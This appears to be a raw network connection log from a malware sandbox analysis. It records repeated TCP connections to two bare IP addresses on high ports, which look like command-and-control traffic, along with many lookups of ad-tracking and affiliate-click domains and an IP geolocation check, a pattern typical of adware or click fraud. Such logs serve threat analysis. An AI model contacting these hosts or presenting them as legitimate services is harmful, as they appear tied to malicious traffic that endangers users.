US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
US 8.8.8.8:53 impression.appsflyer.com udp
DE 185.151.204.50:443 view.adjust.com tcp
NL 65.9.83.76:443 impression.appsflyer.com tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.119.102:32795 tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
US 130.211.37.129:443 www.trafficmob.net tcp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
US 104.248.224.82:40573 tcp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 offersix.info udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.248.224.82:40573 tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 offersix.info udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 104.248.224.82:40573 tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 104.248.224.82:40573 tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 update.googleapis.com udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
NL 142.250.179.163:443 update.googleapis.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 impression.appsflyer.com udp
US 8.8.8.8:53 offersix.info udp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
NL 65.9.83.127:443 impression.appsflyer.com tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.76:443 impression.appsflyer.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.119.102:32795 tcp
US 104.248.119.102:32795 tcp
US 104.248.119.102:32795 tcp
US 104.248.119.102:32795 tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
US 8.8.8.8:53 www.trafficmob.net udp
US 8.8.8.8:53 api.bdisl.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 apis.google.com udp
US 8.8.8.8:53 www.trafficmob.net udp
NL 142.250.179.142:443 apis.google.com tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 ip-api.com udp
US 104.248.224.82:40573 tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 giftsendmedia.com udp
US 172.67.128.160:80 giftsendmedia.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 104.248.224.82:40573 tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 offersix.info udp
US 8.8.8.8:53 www.ghastrk.com udp
US 8.8.8.8:53 adyourapp505.o18.click udp
SG 172.104.40.4:80 offersix.info tcp
US 35.244.206.233:443 www.ghastrk.com tcp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 8.8.8.8:53 giftsendmedia.com udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 172.67.128.160:443 giftsendmedia.com tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 giftsendmedia.com udp
US 8.8.8.8:53 giftsendmedia.com udp
US 8.8.8.8:53 giftsendmedia.com udp
US 172.67.128.160:443 giftsendmedia.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 172.67.128.160:443 giftsendmedia.com tcp
US 104.21.1.56:443 giftsendmedia.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 giftsendmedia.com udp
US 172.67.128.160:443 giftsendmedia.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 giftsendmedia.com udp
US 104.248.224.82:40573 tcp
US 172.67.128.160:443 giftsendmedia.com tcp
US 8.8.8.8:53 track.mialltrack2.com udp
US 52.202.247.75:443 track.mialltrack2.com tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.22.7.191:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 wmadv.go2cloud.org udp
US 104.248.224.82:40573 tcp
US 52.205.36.237:443 wmadv.go2cloud.org tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 track.mialltrack2.com udp
US 52.202.247.75:443 track.mialltrack2.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 wmadv.go2cloud.org udp
US 104.248.224.82:40573 tcp
US 34.198.147.111:443 wmadv.go2cloud.org tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 wmadv.go2cloud.org udp
US 8.8.8.8:53 track.mialltrack2.com udp
US 52.202.247.75:443 track.mialltrack2.com tcp
US 52.205.36.237:443 wmadv.go2cloud.org tcp
US 104.248.224.82:40573 tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 track.mialltrack2.com udp
US 52.202.247.75:443 track.mialltrack2.com tcp
US 8.8.8.8:53 click.trackknad.com udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 45.76.76.194:80 click.trackknad.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.22.7.191:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 mobadoo.g2afse.com udp
NL 213.227.134.238:443 mobadoo.g2afse.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 api.bdisl.com udp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.250.148.146:80 api.bdisl.com tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 8.8.8.8:53 offersix.info udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 8.8.8.8:53 www.trafficmob.net udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
US 104.248.224.82:40573 tcp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 104.248.224.82:40573 tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.22.6.191:443 adyourapp505.o18.click tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 translate.googleapis.com udp
US 104.248.224.82:40573 tcp
NL 142.250.179.138:443 translate.googleapis.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 searchengineads.net udp
VN 103.63.108.18:443 searchengineads.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 searchengineads.net udp
VN 103.63.108.18:443 searchengineads.net tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 104.248.119.102:32795 tcp
US 104.248.119.102:32795 tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 feed.lookbox.net udp
US 8.8.8.8:53 www.ghastrk.com udp
US 172.67.164.57:443 feed.lookbox.net tcp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 feed.lookbox.net udp
US 104.21.15.206:443 feed.lookbox.net tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 feed.lookbox.net udp
US 104.21.15.206:443 feed.lookbox.net tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.119.102:32795 tcp
US 104.248.119.102:32795 tcp
US 104.248.119.102:32795 tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 searchada.com udp
US 3.234.28.191:443 searchada.com tcp
US 8.8.8.8:53 searchada.com udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 3.234.28.191:443 searchada.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
